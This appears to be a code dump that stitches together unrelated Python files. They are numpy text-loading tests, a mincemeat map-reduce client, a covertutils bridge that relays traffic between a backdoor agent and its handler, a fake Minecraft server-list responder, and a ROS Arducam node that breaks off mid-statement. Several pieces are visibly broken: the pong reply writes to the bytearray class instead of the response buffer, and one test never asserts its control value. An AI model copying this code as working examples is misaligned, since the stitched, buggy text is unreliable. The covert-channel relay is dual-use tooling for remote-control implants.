def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(TextIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(TextIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), **kwargs)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values=-999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b'testNonetherestofthedata')
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b' testNonetherestofthedata')
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file object
wanted = np.arange(6).reshape((2, 3))
if sys.version_info[0] >= 3:
# python 3k is known to fail for '\r'
linesep = ('\n', '\r\n')
else:
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
f, name = mkstemp()
# We can't use NamedTemporaryFile on windows, because we cannot
# reopen the file.
try:
os.write(f, asbytes(data))
assert_array_equal(np.genfromtxt(name), wanted)
finally:
os.close(f)
os.unlink(name)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokeness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
gc.collect()
n_before = len(gc.get_objects())
np.load(f)
n_after = len(gc.get_objects())
assert_equal(n_before, n_after)
if __name__ == "__main__":
run_module_suite()
|
distmm.py
|
import mincemeat
from mincemeat import Protocol
import socket
import time
import sys
import logging
import logging.handlers
import multiprocessing
from multiprocessing import Pool, Process
import optparse
import collections
import fileiter
import pickle
from mincemeatpy.registry import Registry
import re
import string
MINIMUM_CLIENT_SLEEP_SECONDS = 1
DEFAULT_HOSTNAME = 'localhost'
DEFAULT_PASSWORD = 'changeme'
VERSION = '0.0.1'
DEFAULT_PORT = mincemeat.DEFAULT_PORT
READ_STEP = 500
DELIMITER = ' '
class Client(mincemeat.Client):
def __init__(self, id=None):
mincemeat.Client.__init__(self)
self.key = ''
self.input_file = ''
self.command = b''
if id is not None:
self.id = id
def validate(self, command, data):
task_id, input_file = data
self.key = ''
self.command = command
self.input_file = input_file
if command == b'map':
logging.info("Validate map task")
self.key = Registry.get_instance().generate_key(self.mapfn, input_file)
else:
logging.info("Validate reduce task for %s" % input_file[0])
# self.key = ''
self.key = Registry.get_instance().generate_key_from_files(self.reducefn, input_file)
self.send_command(b'keyurl', (task_id, (self.key, None)))
def start_map(self, command, data):
logging.info("Mapping %s at client %s" % (str(data[0]), self.id))
file = dict(enumerate(fileiter.read(data[1], READ_STEP)))
results = {}
''' running map func on assigned split '''
for key, lines in file.items():
self.call_mapfn(results, (key, lines))
output_file = "%s_map_output" % data[0]
pickle.dump(results, open(output_file, 'wb'))
logging.info("generate map results at %s" % output_file)
self.send_command(b'mapdone', (data[0], (self.key, [output_file])))
def call_mapfn(self, results, data):
for k, v in self.mapfn(data[0], data[1]):
if k not in results:
results[k] = []
results[k].append(v)
if self.collectfn:
for k in results:
results[k] = [self.collectfn(k, results[k])]
''' TODO: add partition function '''
def start_reduce(self, command, data):
logging.info("Reducing %s at client %s" % (str(data[0]), self.id))
input_files = data[1]
results = {}
for file in input_files:
input_file = pickle.load(open(file, 'rb'))
for k, v in input_file.items():
if k not in results:
results[k] = v
results[k].extend(v)
output_file = "%s_reduce_output" % data[0]
file = open(output_file, 'w')
for k, v in results.items():
file.write("%s, %s\n" % (k, str(self.call_reducefn((k, v)))))
file.close()
self.send_command(b'reducedone', (data[0], (self.key, output_file)))
def call_reducefn(self, data):
return self.reducefn(data[0], data[1])
def start_task(self, command, data):
task_id, url = data
if url is None:
commands = {
b'map': self.start_map,
b'reduce': self.start_reduce
}
commands[self.command](self.command, (task_id, self.input_file))
else:
commands = {
b'map': b'mapdone',
b'reduce': b'reducedone'
}
if self.command == b'map':
url = [url]
self.send_command(commands[self.command], (task_id, (self.key, url)))
def process_command(self, command, data=None):
commands = {
b'mapfn': self.set_mapfn,
b'collectfn': self.set_collectfn,
b'reducefn': self.set_reducefn,
b'map': self.validate,
b'reduce': self.validate,
b'url': self.start_task
}
if command in commands:
commands[command](command, data)
else:
Protocol.process_command(self, command, data)
def run(self, options):
client_sleep_seconds = None
if options.client_sleep_seconds is not None:
client_sleep_seconds = float(options.client_sleep_seconds)
while True:
try:
if type(options.password) == str:
options.password = bytes(options.password, "utf-8")
self.password = options.password
self.conn(options.hostname, options.port)
break
except socket.error:
exc_info = sys.exc_info()
logging.debug("%s:{hostname=%s, port=%s}:%s",
exc_info[0],
options.hostname,
options.port,
exc_info[1])
if client_sleep_seconds is None:
time.sleep(MINIMUM_CLIENT_SLEEP_SECONDS)
break
else:
time.sleep(client_sleep_seconds)
print('socket error')
self.__init__()
except KeyboardInterrupt:
break
except:
exc_info = sys.exc_info()
logging.exception("%s:%s", exc_info[0], exc_info[1])
break
def run_client(queue=None, options=None):
h = logging.handlers.QueueHandler(queue)
root = logging.getLogger()
root.addHandler(h)
if options.verbose:
root.setLevel(logging.INFO)
if options.loud:
root.setLevel(logging.DEBUG)
if options.quiet:
root.setLevel(logging.FATAL)
while True:
try:
client = Client(0)
client.run(options)
except KeyboardInterrupt:
break
except:
exc_info = sys.exc_info()
logging.exception("%s:%s", exc_info[0], exc_info[1])
break
finally:
print('end client')
if not options.run_forever:
break
def client_options_parser():
parser = optparse.OptionParser(usage='%prog [options]', version='%%prog %s' % VERSION)
parser.add_option('-p', '--password', dest='password', default=DEFAULT_PASSWORD, help='password')
parser.add_option('-H', '--hostname', dest='hostname', default=DEFAULT_HOSTNAME, help='hostname')
parser.add_option('-P', '--port', dest='port', type='int', default=DEFAULT_PORT, help='port')
parser.add_option('-v', '--verbose', dest='verbose', action='store_true')
parser.add_option('-V', '--loud', dest='loud', action='store_true')
parser.add_option('-q', '--quiet', dest='quiet', action='store_true')
parser.add_option('-n', '--number_of_clients', dest='number_of_clients', default='1',
help='number of client processes')
parser.add_option('-s', '--sleep', dest='client_sleep_seconds', default=None, help='client sleep seconds')
parser.add_option('-t', '--client_timeout', dest='client_timeout_seconds', default=None,
help='worker timeout seconds')
parser.add_option('-8', '--run_forever', dest='run_forever', action='store_true')
parser.add_option('-i', '--input_filename', dest='input_filename', default='', help='input filename')
return parser
def run_clients(queue, options=None):
parser = client_options_parser()
(default_options, args) = parser.parse_args([])
if options is not None:
try:
default_options.__dict__.update(options.__dict__)
except:
default_options.__dict__.update(options)
options = default_options
number_of_clients = int(options.number_of_clients)
pool = Pool(processes=number_of_clients)
try:
for i in range(number_of_clients):
pool.apply_async(run_client, kwds=dict(options=options, queue=queue))
except KeyboardInterrupt:
exc_info = sys.exc_info()
logging.debug("%s:%s", exc_info[0], exc_info[1])
pool.terminate()
pool.join()
except:
exc_info = sys.exc_info()
logging.exception("%s:%s", exc_info[0], exc_info[1])
pool.terminate()
else:
pool.close()
finally:
print('end pool')
pool.join()
def map_default(k, v):
yield k, v
def reduce_default(k, vs):
if len(vs) == 1:
return vs[0]
else:
return vs
class Server(mincemeat.Server):
def __init__(self, datasource=None):
mincemeat.Server.__init__(self)
self.datasource = datasource
self.mapfn = map_default
self.reducefn = reduce_default
def run_server(options):
parser = client_options_parser()
(default_options, args) = parser.parse_args([])
if options is not None:
try:
default_options.__dict__.update(options.__dict__)
except:
default_options.__dict__.update(options)
options = default_options
logging.debug(options)
''' initialize server data and assign map/reduce function '''
datasource = None
if isinstance(options.datasource, collections.Mapping):
datasource = options.datasource
else:
datasource = dict(enumerate(options.datasource))
server = None
if 'server' in options.__dict__:
server = options.server(datasource)
else:
server = Server(datasource)
if 'mapfn' in options.__dict__:
server.mapfn = options.mapfn
if 'reducefn' in options.__dict__:
server.reducefn = options.reducefn
if 'cache' in options.__dict__:
server.cache_on = options.cache
return server.run_server(password=options.password)
def listener_configurer():
root = logging.getLogger()
h = logging.FileHandler('debug.log', 'a')
f = logging.Formatter('%(asctime)s %(processName)-10s %(name)s %(levelname)-8s %(message)s')
h.setFormatter(f)
root.addHandler(h)
def listener_process(queue, configurer):
configurer()
while True:
try:
record = queue.get()
if record is None: # We send this as a sentinel to tell the listener to quit.
break
logger = logging.getLogger(record.name)
logger.handle(record) # No level or filter logic applied - just do it!
except Exception:
import sys, traceback
print('Whoops! Problem:', file=sys.stderr)
traceback.print_exc(file=sys.stderr)
if __name__ == '__main__':
parser = client_options_parser()
(options, args) = parser.parse_args()
if options.verbose:
logging.basicConfig(level=logging.INFO)
if options.loud:
logging.basicConfig(level=logging.DEBUG)
if options.quiet:
logging.basicConfig(level=logging.FATAL)
if len(args) > 0:
options.hostname = args[0]
logging.debug('options: %s', options)
queue = multiprocessing.Manager().Queue(-1)
listener = Process(target=listener_process, args=(queue, listener_configurer))
listener.start()
# p = Process(target=run_clients, args=(queue, options))
# p.start()
# p.join()
run_clients(queue, options)
queue.put_nowait(None)
listener.join()
print('end')
|
simplebridge.py
|
from covertutils.handlers import BufferingHandler
from threading import Thread
from time import sleep
class SimpleBridge :
"""
The Bridge class is used to pass messages between 2 Handler objects. It can be used to bridge an Agent and a Handler using a third host.
"""
def __init__( self, lhandler, rhandler ) :
if not( isinstance(lhandler, BufferingHandler) and isinstance(rhandler, BufferingHandler) ) :
raise TypeError( "Argument is not of type 'BufferingHandler'" )
self.lcondition = lhandler.getCondition()
self.rcondition = rhandler.getCondition()
self.l2r_thread = Thread( target = self.__intercommunication, args = ( lhandler, rhandler, self.lcondition ) )
self.r2l_thread = Thread( target = self.__intercommunication, args = ( rhandler, lhandler, self.rcondition ) )
self.r2l_thread.daemon = True
self.l2r_thread.daemon = True
self.r2l_thread.start()
self.l2r_thread.start()
def __intercommunication( self, lhandler, rhandler, lcondition ) :
while True :
# print "Started loop"
lcondition.acquire()
# print "Started acquired!"
if lhandler.empty() :
lcondition.wait()
# print "Acquired condition"
stream, message = lhandler.get()
# print stream, message
# print "Sending"
rhandler.preferred_send( message, stream )
lcondition.release()
# lcondition.notify()
# print "Leaving loop"
sleep(0.01)
|
socket_server.py
|
import json
import socket
import uuid
from threading import Thread
import byte_utils
class SocketServer:
def __init__(self, ip, port, motd, version_text, kick_message, samples, server_icon, logger, show_hostname, player_max, player_online, protocol):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.ip = ip
self.port = port
self.motd = motd
self.version_text = version_text
self.kick_message = kick_message
self.samples = samples
self.server_icon = server_icon
self.logger = logger
self.show_hostname = show_hostname
self.player_max = player_max
self.player_online = player_online
self.protocol = protocol
def on_new_client(self, client_socket, addr):
data = client_socket.recv(1024)
client_ip = addr[0]
fqdn = socket.getfqdn(client_ip)
if self.show_hostname and client_ip != fqdn:
client_ip = fqdn + "/" + client_ip
try:
(length, i) = byte_utils.read_varint(data, 0)
(packetID, i) = byte_utils.read_varint(data, i)
if packetID == 0:
(version, i) = byte_utils.read_varint(data, i)
(ip, i) = byte_utils.read_utf(data, i)
ip = ip.replace('\x00', '').replace("\r", "\\r").replace("\t", "\\t").replace("\n", "\\n")
is_using_fml = False
if ip.endswith("FML"):
is_using_fml = True
ip = ip[:-3]
(port, i) = byte_utils.read_ushort(data, i)
(state, i) = byte_utils.read_varint(data, i)
if state == 1:
self.logger.info(("[%s:%s] Received client " + ("(using ForgeModLoader) " if is_using_fml else "") +
"ping packet (%s:%s).") % (client_ip, addr[1], ip, port))
motd = {}
motd["version"] = {}
motd["version"]["name"] = self.version_text
motd["version"]["protocol"] = self.protocol
motd["players"] = {}
motd["players"]["max"] = self.player_max
motd["players"]["online"] = self.player_online
motd["players"]["sample"] = []
for sample in self.samples:
motd["players"]["sample"].append({"name": sample, "id": str(uuid.uuid4())})
motd["description"] = {"text": self.motd}
if self.server_icon and len(self.server_icon) > 0:
motd["favicon"] = self.server_icon
self.write_response(client_socket, json.dumps(motd))
elif state == 2:
name = ""
if len(data) != i:
(some_int, i) = byte_utils.read_varint(data, i)
(some_int, i) = byte_utils.read_varint(data, i)
(name, i) = byte_utils.read_utf(data, i)
self.logger.info(
("[%s:%s] " + (name + " t" if len(name) > 0 else "T") + "ries to connect to the server " +
("(using ForgeModLoader) " if is_using_fml else "") + "(%s:%s).")
% (client_ip, addr[1], ip, port))
self.write_response(client_socket, json.dumps({"text": self.kick_message}))
else:
self.logger.info(
"[%s:%d] Tried to request a login/ping with an unknown state: %d" % (client_ip, addr[1], state))
elif packetID == 1:
(long, i) = byte_utils.read_long(data, i)
response = bytearray()
byte_utils.write_varint(response, 9)
byte_utils.write_varint(response, 1)
bytearray.append(long)
client_socket.sendall(bytearray)
self.logger.info("[%s:%d] Responded with pong packet." % (client_ip, addr[1]))
else:
self.logger.warning("[%s:%d] Sent an unexpected packet: %d" % (client_ip, addr[1], packetID))
except (TypeError, IndexError):
self.logger.warning("[%s:%s] Received invalid data (%s)" % (client_ip, addr[1], data))
return
def write_response(self, client_socket, response):
response_array = bytearray()
byte_utils.write_varint(response_array, 0)
byte_utils.write_utf(response_array, response)
length = bytearray()
byte_utils.write_varint(length, len(response_array))
client_socket.sendall(length)
client_socket.sendall(response_array)
def start(self):
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.ip, self.port))
self.sock.settimeout(5000)
self.sock.listen(30)
self.logger.info("Server started on %s:%s! Waiting for incoming connections..." % (self.ip, self.port))
while 1:
(client, address) = self.sock.accept()
Thread(target=self.on_new_client, daemon=True, args=(client, address,)).start()
def close(self):
self.sock.close()
|
arducam_long.py
|
#!/usr/bin/env python
import sys
import os
import time
import cv2
import threading
import numpy as np
import signal
import json
import Image
import ArducamSDK
import rospy
from sensor_msgs.msg import CompressedImage, Image
from cv_bridge import CvBridge, CvBridgeError
from std_msgs.msg import String
global cfg,handle,running,Width,Heigth,save_flag,color_mode,ct_lock,rt_lock,count1
global logging, logname,loghandle,loghandle1,logpath, log_stepsize, curr_logging, max_num_frames_log, curr_num_frames_log
count1 = 0
ct_lock = threading.Lock()
rt_lock = threading.Lock()
logging = False
logname = "unknown"
logpath = "/home/niggi/Desktop/arducam_logs"
log_stepsize = 10
curr_logging = False
max_num_frames_log=5
curr_num_frames_log=0
running = True
save_flag = False
cfg = {}
handle = {}
global COLOR_BayerGB2BGR,COLOR_BayerRG2BGR,COLOR_BayerGR2BGR,COLOR_BayerBG2BGR
COLOR_BayerBG2BGR = 46
COLOR_BayerGB2BGR = 47
COLOR_BayerRG2BGR = 48
COLOR_BayerGR2BGR = 49
def configBoard(fileNodes):
global handle
for i in range(0,len(fileNodes)):
fileNode = fileNodes[i]
buffs = []
command = fileNode[0]
value = fileNode[1]
index = fileNode[2]
buffsize = fileNode[3]
for j in range(0,len(fileNode[4])):
buffs.append(int(fileNode[4][j],16))
ArducamSDK.Py_ArduCam_setboardConfig(handle,int(command,16),int(value,16),int(index,16),int(buffsize,16),buffs)
pass
def JPGToMat(data,datasize):
image = np.frombuffer(data,np.uint8,count = datasize)
return cv2.imdecode(image,cv2.IMREAD_ANYCOLOR)
def YUVToMat(data):
global Width,Height
image = np.frombuffer(data, np.uint8).reshape( Height,Width , 2 )
return cv2.cvtColor(image,cv2.COLOR_YUV2BGR_YUYV)
def RGB565ToMat(data):
global Width,Height
arr = np.frombuffer(data,dtype=np.uint16).astype(np.uint32)
arr = ((arr & 0xFF00) >> 8) + ((arr & 0x00FF) << 8)
arr = 0xFF000000 + ((arr & 0xF800) << 8) + ((arr & 0x07E0) << 5) + ((arr & 0x001F) << 3)
arr.dtype = np.uint8
iamge = arr.reshape(Height,Width,4)
return cv2.flip(iamge,0)
def writeSensorRegs(fileNodes):
global handle
for i in range(0,len(fileNodes)):
fileNode = fileNodes[i]
regAddr = int(fileNode[0],16)
val = int(fileNode[1],16)
ArducamSDK.Py_ArduCam_writeSensorReg(handle,regAddr,val)
pass
def writeSingleSensorReg(reg_str,val_str):
global handle
regAddr = int(reg_str,16)
val = int(val_str,16)
ArducamSDK.Py_ArduCam_writeSensorReg(handle,regAddr,val)
#check if value sucessfully changed:
if (val == ArducamSDK.Py_ArduCam_readSensorReg(handle,regAddr)[1]):
print ("SUCCESFULLY CHANGED" + ' ' + hex(regAddr) + ' ' + "TO" + ' ' + hex(val))
else:
rospy.logerr ("WRITING COMMAND NOT SUCCESFULL")
def readSingleSensorReg(reg_str):
global handle
regAddr = int(reg_str,16)
val = ArducamSDK.Py_ArduCam_readSensorReg(handle,regAddr)[1]
print ("VALUE OF" + ' ' + hex(regAddr) + ' ' + "IS" + ' ' + hex(val))
def camera_initFromFile(fialeName):
global cfg,handle,Width,Height,color_mode
#load config file
config = json.load(open(fialeName,"r"))
camera_parameter = config["camera_parameter"]
Width = int(camera_parameter["SIZE"][0])
Height = int(camera_parameter["SIZE"][1])
BitWidth = camera_parameter["BIT_WIDTH"]
FmtMode = int(camera_parameter["FORMAT"][0])
color_mode = (int)(camera_parameter["FORMAT"][1])
print "color mode",color_mode
I2CMode = camera_parameter["I2C_MODE"]
SensorShipAddr = int(camera_parameter["I2C_ADDR"],16)
cfg = {"u32CameraType":0x4D091031,
"u32Width":Width,"u32Height":Height,
"u32UsbVersion":0,
"u8PixelBytes":1,
"u16Vid":0,
"u32Size":0,
"u8PixelBits":BitWidth,
"u32SensorShipAddr":SensorShipAddr,
"emI2cMode":I2CMode,
"emImageFmtMode":FmtMode }
#ret,handle,rtn_cfg = ArducamSDK.Py_ArduCam_open(cfg,0)
ret,handle,rtn_cfg = ArducamSDK.Py_ArduCam_autoopen(cfg)
if ret == 0:
#ArducamSDK.Py_ArduCam_writeReg_8_8(handle,0x46,3,0x00)
usb_version = rtn_cfg['u32UsbVersion']
#print "USB VERSION:",usb_version
#config board param
configBoard(config["board_parameter"])
if usb_version == ArducamSDK.USB_1 or usb_version == ArducamSDK.USB_2:
configBoard(config["board_parameter_dev2"])
if usb_version == ArducamSDK.USB_3:
configBoard(config["board_parameter_dev3_inf3"])
if usb_version == ArducamSDK.USB_3_2:
configBoard(config["board_parameter_dev3_inf2"])
writeSensorRegs(config["register_parameter"])
if usb_version == ArducamSDK.USB_3:
writeSensorRegs(config["register_parameter_dev3_inf3"])
if usb_version == ArducamSDK.USB_3_2:
writeSensorRegs(config["register_parameter_dev3_inf2"])
rtn_val,datas = ArducamSDK.Py_ArduCam_readUserData(handle,0x400-16, 16)
print "Serial: %c%c%c%c-%c%c%c%c-%c%c%c%c"%(datas[0],datas[1],datas[2],datas[3],
datas[4],datas[5],datas[6],datas[7],
datas[8],datas[9],datas[10],datas[11])
return True
else:
print "open fail"
return False
pass
def captureImage_thread():
global handle,running, ct_lock, count1
rtn_val = ArducamSDK.Py_ArduCam_beginCaptureImage(handle)
if rtn_val != 0:
print "Error beginning capture, rtn_val = ",rtn_val
running = False
return
else:
print "Capture began, rtn_val = ",rtn_val
while (running and (not rospy.is_shutdown())):
#print "capture"
if count1==0:
if ct_lock.acquire(False):
print "capture image", count1
rtn_val = ArducamSDK.Py_ArduCam_captureImage(handle)
count1 = count1 +1
if rtn_val != 0:
print "Error capture image, rtn_val = ",rtn_val
break
else:
time.sleep(0.005)
ct_lock.release()
else:
time.sleep(0.005)
else:
time.sleep(0.005)
running = False
ArducamSDK.Py_ArduCam_endCaptureImage(handle)
def readImage_thread(publisher_img):
global handle,running,Width,Height,save_flag,cfg,color_mode, rt_lock, count1
global COLOR_BayerGB2BGR,COLOR_BayerRG2BGR,COLOR_BayerGR2BGR,COLOR_BayerBG2BGR
global logpath,loghandle,log_stepsize,logging, curr_logging, loghandle1, max_num_frames_log, curr_num_frames_log
bridge = CvBridge()
count = 0
totalFrame = 0
time0 = time.time()
time1 = time.time()
data = {}
# DEMO WINDOW DECISION!!!
cv2.namedWindow("ArduCam Demo",1)
if not os.path.exists("images1"):
os.makedirs("images1")
print "CIAO"
if not os.path.exists(logpath):
oldmask = os.umask(000)
os.makedirs(logpath,0777)
print "CREATING DIRECTORY"
while running:
if count1 == 1:
if rt_lock.acquire(False):
print "read image", count1
display_time = time.time()
if ArducamSDK.Py_ArduCam_availableImage(handle) > 0:
rtn_val,data,rtn_cfg = ArducamSDK.Py_ArduCam_readImage(handle)
datasize = rtn_cfg['u32Size']
if rtn_val != 0:
print "read data fail!"
continue
if datasize == 0:
continue
image = None
emImageFmtMode = cfg['emImageFmtMode']
if emImageFmtMode == ArducamSDK.FORMAT_MODE_JPG:
image = JPGToMat(data,datasize)
if emImageFmtMode == ArducamSDK.FORMAT_MODE_YUV:
image = YUVToMat(data)
if emImageFmtMode == ArducamSDK.FORMAT_MODE_RGB:
image = RGB565ToMat(data)
if emImageFmtMode == ArducamSDK.FORMAT_MODE_MON:
image = np.frombuffer(data, np.uint8).reshape( Height,Width , 1 )
if logging:
curr_logging = True
#save ENTIRE IMAGE!!!
np.save(loghandle1, image)
prev_bin = 0
for i in range (log_stepsize,255,log_stepsize):
#print i
#print bigger0-bigger20
smaller = (image < i).sum()
loghandle.write(str(smaller-prev_bin) + ',' + ' ')
prev_bin = smaller
#last one:
smaller = (image < 256).sum()
loghandle.write(str(smaller - prev_bin) + ';' + '\n')
curr_num_frames_log +=1
if not (curr_num_frames_log<=max_num_frames_log):
logging = False
loghandle.close()
loghandle1.close()
print "Logging to" + logname + "has ended"
curr_num_frames_log=0
curr_logging = False
if emImageFmtMode == ArducamSDK.FORMAT_MODE_RAW:
image = np.frombuffer(data, np.uint8).reshape( Height,Width , 1 )
if color_mode == 0:
image = cv2.cvtColor(image,COLOR_BayerRG2BGR)
if color_mode == 1:
image = cv2.cvtColor(image,COLOR_BayerGR2BGR)
if color_mode == 2:
image = cv2.cvtColor(image,COLOR_BayerGB2BGR)
if color_mode == 3:
image = cv2.cvtColor(image,COLOR_BayerBG2BGR)
if color_mode < 0 and color_mode > 3:
